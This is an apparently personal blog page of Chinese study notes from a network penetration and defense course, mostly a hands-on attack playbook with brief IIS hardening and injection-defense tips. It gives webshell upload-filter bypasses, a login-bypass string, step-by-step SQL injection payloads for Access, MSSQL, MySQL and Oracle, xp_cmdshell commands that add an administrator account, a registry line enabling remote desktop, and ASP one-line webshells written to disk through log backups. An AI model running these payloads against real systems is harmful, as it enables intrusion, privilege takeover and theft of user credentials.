<!doctype html>



  


<html class="theme-next muse use-motion">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>



<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />












  <link href="/vendors/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css"/>




  <link href="//fonts.googleapis.com/css?family=Lato:300,400,700,400italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">



<link href="/vendors/font-awesome/css/font-awesome.min.css?v=4.4.0" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=0.5.0" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="Uknow, uknowsec.cn, uknowsec, uknow's blog, Uknow’s Blog" />





  <link rel="alternate" href="/atom.xml" title="Uknow’s Blog" type="application/atom+xml" />




  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=0.5.0" />






<meta property="og:type" content="article">
<meta property="og:title" content="安全牛：网络渗透与深度防御视频-整理笔记">
<meta property="og:url" content="http://uknowsec.cn/posts/notes/安全牛：网络渗透与深度防御整理笔记.html">
<meta property="og:site_name" content="Uknow’s Blog">
<meta property="og:image" content="http://obr4sfdq7.bkt.clouddn.com/1622444d95f1718371.png">
<meta property="og:updated_time" content="2016-11-24T03:09:16.079Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="安全牛：网络渗透与深度防御视频-整理笔记">
<meta name="twitter:image" content="http://obr4sfdq7.bkt.clouddn.com/1622444d95f1718371.png">



<script type="text/javascript" id="hexo.configuration">
  var NexT = window.NexT || {};
  var CONFIG = {
    scheme: 'Muse',
    sidebar: {"position":"left","display":"always"},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: 6316725929833924000,
      author: 'Uknow'
    }
  };
</script>

  <title> 安全牛：网络渗透与深度防御视频-整理笔记 | Uknow’s Blog </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  



<script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?225ebcce29d319519ac7c7690425d1d4";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script>








  
  
    
  

  <div class="container one-collumn sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-meta ">
  

  <div class="custom-logo-site-title">
    <a href="/"  class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <span class="site-title">Uknow’s Blog</span>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>
  <p class="site-subtitle"></p>
</div>

<div class="site-nav-toggle">
  <button>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
  </button>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-home fa-fw"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-th fa-fw"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-user fa-fw"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-archive fa-fw"></i> <br />
            
            归档
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="#" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup">
 <span class="search-icon fa fa-search"></span>
 <input type="text" id="local-search-input">
 <div id="local-search-result"></div>
 <span class="popup-btn-close">close</span>
</div>


    </div>
  
</nav>

 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  
  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                安全牛：网络渗透与深度防御视频-整理笔记
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            <span class="post-meta-item-icon">
              <i class="fa fa-calendar-o"></i>
            </span>
            <span class="post-meta-item-text">发表于</span>
            <time itemprop="dateCreated" datetime="2016-11-20T19:06:17+08:00" content="2016-11-20">
              2016-11-20
            </time>
          </span>

          
            <span class="post-category" >
              &nbsp; | &nbsp;
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
              
                <span itemprop="about" itemscope itemtype="https://schema.org/Thing">
                  <a href="/categories/notes/" itemprop="url" rel="index">
                    <span itemprop="name">笔记</span>
                  </a>
                </span>

                
                

              
            </span>
          

          
            
              <span class="post-comments-count">
                &nbsp; | &nbsp;
                <a href="/posts/notes/安全牛：网络渗透与深度防御整理笔记.html#comments" itemprop="discussionUrl">
                  <span class="post-comments-count ds-thread-count" data-thread-key="posts/notes/安全牛：网络渗透与深度防御整理笔记.html" itemprop="commentsCount"></span>
                </a>
              </span>
            
          

          

          
          
             <span id="/posts/notes/安全牛：网络渗透与深度防御整理笔记.html" class="leancloud_visitors" data-flag-title="安全牛：网络渗透与深度防御视频-整理笔记">
               &nbsp; | &nbsp;
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               <span class="post-meta-item-text">阅读次数 </span>
               <span class="leancloud-visitors-count"></span>
              </span>
          

        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <p><img src="http://obr4sfdq7.bkt.clouddn.com/1622444d95f1718371.png" alt="安全牛"></p>
<a id="more"></a>
<h2 id="Web加固"><a href="#Web加固" class="headerlink" title="Web加固"></a>Web加固</h2><h3 id="IIS加固"><a href="#IIS加固" class="headerlink" title="IIS加固"></a>IIS加固</h3><ul>
<li>日志:更改默认日志的路径.记录:cookies 协议版本</li>
<li>权限:只读,脚本资源访问<br>主目录</li>
<li>删除所有不需要的脚本扩展名:主目录:asp </li>
<li>向客户端发送以下消息:处理URL出错:<br>主目录–配置–调试</li>
<li>限定访问后台的IP:目录安全性</li>
<li>删除所有自定义错误:防止被挂马</li>
</ul>
<h3 id="防止数据下载"><a href="#防止数据下载" class="headerlink" title="防止数据下载"></a>防止数据下载</h3><ul>
<li>修改数据库名,和默认路径</li>
<li>数据库重定向到主页</li>
<li>防暴库：conn.asp:on error resume next</li>
</ul>
<h3 id="NTFS-小到大"><a href="#NTFS-小到大" class="headerlink" title="NTFS:小到大"></a>NTFS:小到大</h3><ul>
<li>删除所有权限。</li>
<li>给administrator完全控制权限</li>
<li>给IIS_WPG  完全控制</li>
<li>给IUSR_HOSTNAME 只读</li>
</ul>
<h3 id="终级防网马-webshell"><a href="#终级防网马-webshell" class="headerlink" title="终级防网马:webshell"></a>终级防网马:webshell</h3><p> 能写不能执行,能执行不能写入</p>
<ul>
<li>哪些目录需要写入权限:data uploadfile uploadface<br>databackup—&gt;iusr_heixia</li>
<li>在IIS中给以下目录拒绝执行权限</li>
</ul>
<h2 id="常用攻击方法"><a href="#常用攻击方法" class="headerlink" title="常用攻击方法"></a>常用攻击方法</h2><h3 id="爆库"><a href="#爆库" class="headerlink" title="爆库"></a>爆库</h3><p>  #：%23<br>  %：%25<br>  空格：%20<br>  www.xx.com/bbs/a.asp?id=1<br>  ‘<br>  id=a<br>   id=999999<br>   第二个/替换为%5c<br>   id[]=1<br>   apsx:~a.asp<br>   jsp:%81,原代码，<br>  .JSP<br>  .js%2527<br>  www.xx.com/abc.asp加不存在页面</p>
<p>  数据库密码技巧<br>  Log日志文件  登录日志</p>
<h3 id="上传webshell"><a href="#上传webshell" class="headerlink" title="上传webshell"></a>上传webshell</h3><ul>
<li><p>无任何限制：<br>　　直接上传</p>
</li>
<li><p>限制后缀：黑名单 asp,asax<br>　　突破：a.cer,a.cdx</p>
</li>
<li><p>后缀替换为空：<br>a.aaspsp<br>　a.asaspp</p>
</li>
<li><p>mine.types:<br>　a.php.rar.rar.rar</p>
</li>
<li><p>a.asp. a#2easp</p>
</li>
<li><p>windows2003解析漏洞：<br>建立文件夹：a.asp<br>里面放任何文件都会解析为.asp</p>
</li>
<li><p>文件改名为：a.asp;.jpg</p>
<p>8.本地验证：<br>前台上传webshell  记录webshell路径<br>后台数据库备份修改后缀</p>
</li>
</ul>
<h2 id="手工注入Access"><a href="#手工注入Access" class="headerlink" title="手工注入Access"></a>手工注入Access</h2><h3 id="注入成因"><a href="#注入成因" class="headerlink" title="注入成因"></a>注入成因</h3><p>程序对用户输入的字符没有进行过滤</p>
<h3 id="后台登录"><a href="#后台登录" class="headerlink" title="后台登录"></a>后台登录</h3><p>万能密码（参数查询不适用）：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">&apos;or&apos;=&apos;or&apos;</div></pre></td></tr></table></figure>
<p>原因分析</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line">登录语句：</div><div class="line">select * from admin where username =&apos;$username&apos; and password=&apos;$password&apos;</div><div class="line"></div><div class="line">插入 &apos;or&apos;=&apos;or&apos;,语句变为：</div><div class="line">select * from admin where username =&apos;&apos;or&apos;=&apos;or&apos;&apos; and password=&apos;$password&apos;</div><div class="line"></div><div class="line">or 前面的单引号用于闭合原语句的单引号，此时username等于空，此时&apos;=&apos;判断为true，</div><div class="line">再与username或判断为true，第二个or后的单引号用于闭合。</div></pre></td></tr></table></figure>
<h3 id="判断注入点"><a href="#判断注入点" class="headerlink" title="判断注入点"></a>判断注入点</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">www.xx.com/a.asp?id=1</div><div class="line">and 1=1 返回正常</div><div class="line">and 1=2 返回错误</div></pre></td></tr></table></figure>
<h3 id="判断数据库类型"><a href="#判断数据库类型" class="headerlink" title="判断数据库类型"></a>判断数据库类型</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">and (select count(*) from 数据库独有表名)&gt;0</div><div class="line">count:统计数据库表个数</div></pre></td></tr></table></figure>
<p>附加:</p>
<table>
<thead>
<tr>
<th>数据库</th>
<th style="text-align:left">数据库独有表名</th>
</tr>
</thead>
<tbody>
<tr>
<td>access</td>
<td style="text-align:left">mssysobjects</td>
</tr>
<tr>
<td>mssql</td>
<td style="text-align:left">sysbojects</td>
</tr>
<tr>
<td>mysql</td>
<td style="text-align:left">infomation_schema.tables</td>
</tr>
<tr>
<td>oracle</td>
<td style="text-align:left">sys.user_tables</td>
</tr>
</tbody>
</table>
<h3 id="判断表名"><a href="#判断表名" class="headerlink" title="判断表名"></a>判断表名</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">and (select count(*) from admin) &gt;0</div><div class="line"></div><div class="line">返回正常 说明admin表存在</div><div class="line">返回错误 说明admin表不存在</div></pre></td></tr></table></figure>
<h3 id="判断列名"><a href="#判断列名" class="headerlink" title="判断列名"></a>判断列名</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">and (select count(admin_user) from admin) &gt;0</div><div class="line"></div><div class="line">将*换成你需要猜的列名即可</div><div class="line">返回正常 说明admin表存在列admin_user</div><div class="line">返回错误 说明admin表不存在列admin_user</div></pre></td></tr></table></figure>
<h3 id="判断字段长度"><a href="#判断字段长度" class="headerlink" title="判断字段长度"></a>判断字段长度</h3><p>判断长度函数：len(admin_user) </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">and (select len(admin_user) from admin)&gt;4   返回正常</div><div class="line">and (select len(admin_user) from admin)&lt;5	返回错误</div><div class="line"></div><div class="line">说明当前密码长度为5</div></pre></td></tr></table></figure>
<h3 id="判断值"><a href="#判断值" class="headerlink" title="判断值"></a>判断值</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">left(admin_user,1)=&apos;a&apos;  判断左边起一个字符是否为a</div><div class="line"></div><div class="line">and (select left(admin_user,1) from admin)=&apos;a&apos;</div><div class="line">and (select left(admin_user,2) from admin)=&apos;ad&apos; 左边起前两个是否为ad</div></pre></td></tr></table></figure>
<h2 id="手工注入MSSQL"><a href="#手工注入MSSQL" class="headerlink" title="手工注入MSSQL"></a>手工注入MSSQL</h2><h3 id="判断注入点-1"><a href="#判断注入点-1" class="headerlink" title="判断注入点"></a>判断注入点</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">and 1=1;    返回正常</div><div class="line">and 1=2;	返回错误</div><div class="line">and @@version&gt;0   判断版本</div></pre></td></tr></table></figure>
<h3 id="查看当前连接数据库的用户名"><a href="#查看当前连接数据库的用户名" class="headerlink" title="查看当前连接数据库的用户名"></a>查看当前连接数据库的用户名</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">and user&gt;0</div><div class="line">返回：</div><div class="line">dbo=sa mssql管理员</div><div class="line">端口 1433</div></pre></td></tr></table></figure>
<h3 id="查看当前连接数据库"><a href="#查看当前连接数据库" class="headerlink" title="查看当前连接数据库"></a>查看当前连接数据库</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">and db_name()&gt;0</div></pre></td></tr></table></figure>
<h3 id="查看其他数据库"><a href="#查看其他数据库" class="headerlink" title="查看其他数据库"></a>查看其他数据库</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">and (select count(*) from master.dbo.sysdatabases where name&gt;1 and dbid=6)&lt;&gt;0</div><div class="line"></div><div class="line">说明：</div><div class="line">sysdatabases里面存储的是一些系统信息，包括所有数据库的名字。</div><div class="line">Dbid就是数据库的id，dbid的值从1到5被系统占用，所以其他数据库是从6开始的</div><div class="line">将name与1比较，类型转换错误也就爆出了数据库的名字。将dbid的值从6开始试下去，就得到了所有的库名</div></pre></td></tr></table></figure>
<h3 id="判断表名-1"><a href="#判断表名-1" class="headerlink" title="判断表名"></a>判断表名</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">and (select top 1 name from sysbojects where xtype=&apos;u&apos; and status&gt;0)&gt;0</div><div class="line"></div><div class="line">说明：</div><div class="line">sysbojects是SQLServer的系统表，存储着所有的表名、视图、约束及其他对象，</div><div class="line">其中&quot;xtype=&apos;u&apos; and status&gt;0&quot;表示用户建立的表名</div><div class="line">上面的语句将第一个表名取出，与0比较大小，让错误信息把表名报出来</div></pre></td></tr></table></figure>
<h3 id="判断其他表"><a href="#判断其他表" class="headerlink" title="判断其他表"></a>判断其他表</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">and (select top 1 name from sysbojects where xtype=&apos;u&apos; and status&gt;0 and name not in (&apos;已猜出表&apos;))&gt;0</div></pre></td></tr></table></figure>
<h3 id="判断列名-1"><a href="#判断列名-1" class="headerlink" title="判断列名"></a>判断列名</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">and (Select Top 1 col_name(object_id(&apos;admin&apos;),1) from sysobjects)&gt;0</div><div class="line"></div><div class="line">说明：</div><div class="line">第一字段为&quot;ID&quot;，用object_id(表名)能获取表名对应的内部ID。</div><div class="line">col_name(表名ID，1)代表该表的第1个字段名，将1换乘2，3，4...</div><div class="line">就可以逐个获取所猜解表里面的所有字段名</div></pre></td></tr></table></figure>
<h3 id="判断值-1"><a href="#判断值-1" class="headerlink" title="判断值"></a>判断值</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">and (select username from admin)&gt;0</div><div class="line">and (select password from admin)&gt;0</div></pre></td></tr></table></figure>
<h3 id="更改密码"><a href="#更改密码" class="headerlink" title="更改密码"></a>更改密码</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">;update 库名.abo.admin表 set password=&apos;a123456&apos; where username=&apos;admin&apos;;--</div><div class="line">--: 注释符</div></pre></td></tr></table></figure>
<h2 id="mssql注入高级操作"><a href="#mssql注入高级操作" class="headerlink" title="mssql注入高级操作"></a>mssql注入高级操作</h2><h3 id="建立数据库用户"><a href="#建立数据库用户" class="headerlink" title="建立数据库用户"></a>建立数据库用户</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">;exec master..sp_addlogin user,pass;--</div></pre></td></tr></table></figure>
<h3 id="数据库提权"><a href="#数据库提权" class="headerlink" title="数据库提权"></a>数据库提权</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">;exec master..sp_addsrvrolemember user,sysadmin;--</div></pre></td></tr></table></figure>
<h3 id="打开3389"><a href="#打开3389" class="headerlink" title="打开3389"></a>打开3389</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">reg add &quot;hklm\System\CurrentControlSet\Control\Terminal Server&quot; /v fDenyTSConnections /t reg_dword /d &quot;0&quot; /f</div></pre></td></tr></table></figure>
<h3 id="建立系统用户"><a href="#建立系统用户" class="headerlink" title="建立系统用户"></a>建立系统用户</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">;exec master..xp_cmdshell &quot;net user username password /add&quot;--</div><div class="line">;exec master..xp_cmdshell &quot;net localgroup administrators username /add&quot;--</div></pre></td></tr></table></figure>
<h3 id="读系统写文件"><a href="#读系统写文件" class="headerlink" title="读系统写文件"></a>读系统写文件</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">1.利用查询分析器连接数据库</div><div class="line">2.create table vvboot (line varchar(8000))  创建表</div><div class="line">3.bulk insert vvboot from &apos;c:\boot.ini&apos;     导入c:\boot.ini内容进tables</div><div class="line">4.select * from vvboot 			    读取tables内容</div></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">;exec master..xp_cmdshell &apos;echo aaa&gt;&gt;c:u.txt&apos;--  写入aa到c:u.txt &gt;&gt;追加</div></pre></td></tr></table></figure>
<h3 id="备份拿一句话木马"><a href="#备份拿一句话木马" class="headerlink" title="备份拿一句话木马"></a>备份拿一句话木马</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">&lt;%execute request(&quot;value&quot;)%&gt;</div><div class="line">&lt;%eval request(&quot;1&quot;)%&gt;</div><div class="line">URL编码：%3C%25execute+request%28%22value%22%29%25%3E </div><div class="line">十六进制：0x3C25657865637574652072657175657374282276616C75652229253E</div></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">；alter database article set RECOVERY FULL--   把恢复改为完全模式</div><div class="line">；create table　　alog (a image)--       建立一个表</div><div class="line">；backup alog article to disk=&apos;c:\cmd&apos; with init--     减少备份大小</div><div class="line">;insert into alog (a) values(&apos;&lt;%execute request(&quot;value&quot;)%&gt;&apos;)--     插入一句话木马</div><div class="line">;backup log article to disk=&apos;C:\darticle3.4\darticle3.4\a.asp&apos;--      备份日志</div></pre></td></tr></table></figure>
<h3 id="注入防范"><a href="#注入防范" class="headerlink" title="注入防范"></a>注入防范</h3><p>安全编码，参数化查询<br>WAF<br>防注入的脚本:<br>过滤关键字:and select update or union post get cookie<br>在有漏洞脚本调用防注入的脚本：</p>
<pre><code>&lt;!--#Include File=&quot;防注入脚本.asp&quot;--&gt;
</code></pre><h2 id="手工注入MySQL"><a href="#手工注入MySQL" class="headerlink" title="手工注入MySQL"></a>手工注入MySQL</h2><h3 id="数据库的管理工具"><a href="#数据库的管理工具" class="headerlink" title="数据库的管理工具"></a>数据库的管理工具</h3><pre><code>phpmyadmin
    默认user:root
    默认pass:php168.com
</code></pre><h3 id="php-ini"><a href="#php-ini" class="headerlink" title="php.ini"></a>php.ini</h3><pre><code>magic_quotes_gpc=on
</code></pre><p>对于GET/POST/Cookie提交的数据中的单引号、双引号、反斜线和空字节进行转义<br>也就是在这个字符前面加上反斜线，提交的“’”会变成“\”</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">&apos;=%2527  绕过限制</div><div class="line">char(90) </div><div class="line">left(boardname,2)=char(97,104)</div></pre></td></tr></table></figure>
<h3 id="uion联合查询"><a href="#uion联合查询" class="headerlink" title="uion联合查询"></a>uion联合查询</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">select table1,table2 from db1</div></pre></td></tr></table></figure>
<p>条件：</p>
<ul>
<li>前后表的列数要相同<pre><code>判断前表查询列数
union select 1 返回正常 表明前表为一列
union select 1,2,3,4,5 返回正常 表明前表为五列
union select null,null,null,null,null 
</code></pre> oracle:<pre><code>union select null,null,null,null,null from dual (oracle默认表名)
</code></pre></li>
<li>前后表对应列的数据类型要兼容<pre><code>判断前表哪列是字符
union select &apos;1&apos;,2,3,4,5   返回正常 说明第一列为字符
</code></pre></li>
<li>如果前表出错，将返回后表的结果<pre><code>id=-1 union select user()
id=-1 union select database()
</code></pre></li>
</ul>
<p>###　判断注入点</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">and 1=1 返回正常</div><div class="line">and 1=2 返回错误</div></pre></td></tr></table></figure>
<h3 id="判断用户名"><a href="#判断用户名" class="headerlink" title="判断用户名"></a>判断用户名</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">id=-1 union select user()   联合查询</div><div class="line">union select current_user() 当前用户</div><div class="line">union select system_user() 系统用户</div><div class="line">id=-1 union select session_user()  连接数据库的用户</div></pre></td></tr></table></figure>
<h3 id="判断版本号"><a href="#判断版本号" class="headerlink" title="判断版本号"></a>判断版本号</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">id=-1 union select version()</div></pre></td></tr></table></figure>
<h3 id="判断当前连接数据库"><a href="#判断当前连接数据库" class="headerlink" title="判断当前连接数据库"></a>判断当前连接数据库</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">id=-1 union select database()</div></pre></td></tr></table></figure>
<h3 id="判断表名-2"><a href="#判断表名-2" class="headerlink" title="判断表名"></a>判断表名</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">id=-1 union select table from ddbname</div></pre></td></tr></table></figure>
<h3 id="判断值-2"><a href="#判断值-2" class="headerlink" title="判断值"></a>判断值</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">id=-1 union select username from dbname</div></pre></td></tr></table></figure>
<h3 id="读文件-load-file"><a href="#读文件-load-file" class="headerlink" title="读文件(load_file())"></a>读文件(load_file())</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">id=-1 union select load_file(&apos;c:\boot.ini&apos;)</div><div class="line">将文件名 c:\boot.ini 转换为十六进制 绕过“\”转义</div></pre></td></tr></table></figure>
<h2 id="手工注入Oracle"><a href="#手工注入Oracle" class="headerlink" title="手工注入Oracle"></a>手工注入Oracle</h2><h3 id="猜字段数"><a href="#猜字段数" class="headerlink" title="猜字段数"></a>猜字段数</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">id=-1union select null , null from dual</div><div class="line">id=-1union select null, null , null from dual</div><div class="line">id=-1 union select null,null,null,null,null,null,null,null,null,null,null,null,null from dual</div></pre></td></tr></table></figure>
<h3 id="猜哪个字段为字符串"><a href="#猜哪个字段为字符串" class="headerlink" title="猜哪个字段为字符串"></a>猜哪个字段为字符串</h3><p>猜哪个字段是字符串型<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">id=-1 union select &apos;1&apos;,null,null,null,null,null,null,null,null,null,null,null,null from dual   第九个</div></pre></td></tr></table></figure></p>
<h3 id="猜用户"><a href="#猜用户" class="headerlink" title="猜用户"></a>猜用户</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">id=-1 union select null,null,null,null,null,null,null,null,user,null,null,null,null from user_tables  </div><div class="line"> 将用户代入字符串字段</div></pre></td></tr></table></figure>
<h3 id="查看版本信息"><a href="#查看版本信息" class="headerlink" title="查看版本信息"></a>查看版本信息</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">id=-1 union select null,null,null,null,null,null,null,null,banner,null,null,null,null from v$version  </div><div class="line"> 将banner代入字符串字段</div></pre></td></tr></table></figure>
<h3 id="看库名"><a href="#看库名" class="headerlink" title="看库名"></a>看库名</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">id=-1 union select null,null,null,null,null,null,null,null,name,null,null,null,null from v$database    </div><div class="line"> 将库名代入字符串字段</div></pre></td></tr></table></figure>
<h3 id="看表数"><a href="#看表数" class="headerlink" title="看表数"></a>看表数</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">id=-1 union select null,null,null,null,null,null,null,null,count(*)||&apos;&apos;,null,null,null,null from user_tables  </div><div class="line"> 将count(*)||&apos;&apos; 函数 代入字符串字段</div></pre></td></tr></table></figure>
<h3 id="看第一个表名"><a href="#看第一个表名" class="headerlink" title="看第一个表名"></a>看第一个表名</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">id=-1 union select null,null,null,null,null,null,null,null,table_name,null,null,null,null from (select rownum aa,table_name from user_tables) where aa=1</div></pre></td></tr></table></figure>
<h3 id="查看表的记录数"><a href="#查看表的记录数" class="headerlink" title="查看表的记录数"></a>查看表的记录数</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">id=-1 union select null,null,null,null,null,null,null,null,count(*)||&apos;&apos;,null,null,null,null from USERINFO</div></pre></td></tr></table></figure>
<h3 id="查看第一条记录"><a href="#查看第一条记录" class="headerlink" title="查看第一条记录"></a>查看第一条记录</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">id=-1 union select null,null,null,null,null,null,null,null,USER_ACCOUNT,null,null,null,null from(select rownum aa,USER_ACCOUNT from USERINFO)where aa=1</div></pre></td></tr></table></figure>
<h3 id="查看密码"><a href="#查看密码" class="headerlink" title="查看密码"></a>查看密码</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">id=-1 union select null,null,null,null,null,null,null,null,PASSWORD,null,null,null,null from(select rownum aa,PASSWORD from USERINFO)where aa=1</div></pre></td></tr></table></figure>

      
    </div>

    <div>
      
        
      
    </div>

    <footer class="post-footer">
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/posts/notes/智能社：JavaScript教程-从入门到精通视频整理笔记.html" rel="next" title="智能社：JavaScript教程-从入门到精通视频-整理笔记">
